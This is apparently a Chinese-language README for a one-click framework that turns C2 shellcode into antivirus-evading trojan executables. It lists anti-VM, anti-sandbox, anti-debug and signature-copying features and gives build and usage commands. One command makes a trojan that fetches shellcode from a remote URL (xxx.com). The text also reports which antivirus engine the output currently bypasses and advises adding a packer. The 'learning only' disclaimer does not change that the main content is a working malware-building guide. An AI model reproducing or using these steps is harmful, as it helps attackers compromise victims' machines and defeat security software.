(2024年6月28日注:大型活动期间暂停维护,已删除核心template)
一款一键化生成免杀木马的shellcode免杀框架,具备本地加载方式和远程加载方式。
- 本地/分离加载
- ollvm混淆编译/gcc编译
- IAT obfuscate
- Anti-VM
- Anti-Sandbox(API Hammering,自定义sleep)
- Anti-Debug
- 内存加密
- add resource/sign
本工具使用mingw或ollvm编译,ollvm编译无需准备编译环境(生成exe较大,qvm需额外操作)
使用mingw编译需要准备好编译环境,下载mingw编译器:
官网地址:https://www.mingw-w64.org/
Windows下载链接: https://sourceforge.net/projects/mingw-w64/files/
我下载的是x86_64-win32-seh,具体请根据系统情况适配,也可以直接下载online installer
添加系统环境变量:
path = 解压目录/mingw64/bin
最好把include和lib也对应添加到环境变量的include和lib中,以免编译找不到链接库
python dataBrawl.py -h
CS或其他C2生成shellcode
-i 指复制目标exe的资源、图标和签名信息
python dataBrawl.py D:\Dev\dataBrawl\payload_x64.bin -b 1 -t stdtemp -i "C:\Users\xxx"
默认在项目跟目录生成result.exe,也可-o指定输出位置
这里是使用gcc编译,目前qvm未报毒,ollvm编译把-b选项输入2,目前qvm存在问题,可以再加个壳,我这里使用enigma protector ,自己大概选择配置下,qvm都无法拦截。https://down.52pojie.cn/Tools/Packers/The_Enigma_Protector_v7.40_x32_x64.rar 不过qvm比较玄学,可能过两天就报毒了,可以直接ollvm编译+壳。
使用ollvm加壳后如果还杀,就改一下加壳的选项。
先生成加密shellcode
python dataBrawl.py D:\Dev\dataBrawl\payload_x64.bin -c 1 -t remote
使用远程模板生成木马
python dataBrawl.py http://www.xxx.com/shellcode.bin -b 1 -t remote -i "C:\Users\xxx"
免责声明: 请注意,本仓库仅用于学习和研究目的。在使用任何与恶意软件开发相关的技术时,请遵守当地法律法规,不要进行任何违法活动。对于任何不当使用造成的后果,本仓库的维护者不承担任何责任。
欢迎提出建议、报告漏洞或贡献代码以改进本仓库的内容。让我们共同努力,提高网络安全意识和技术水平!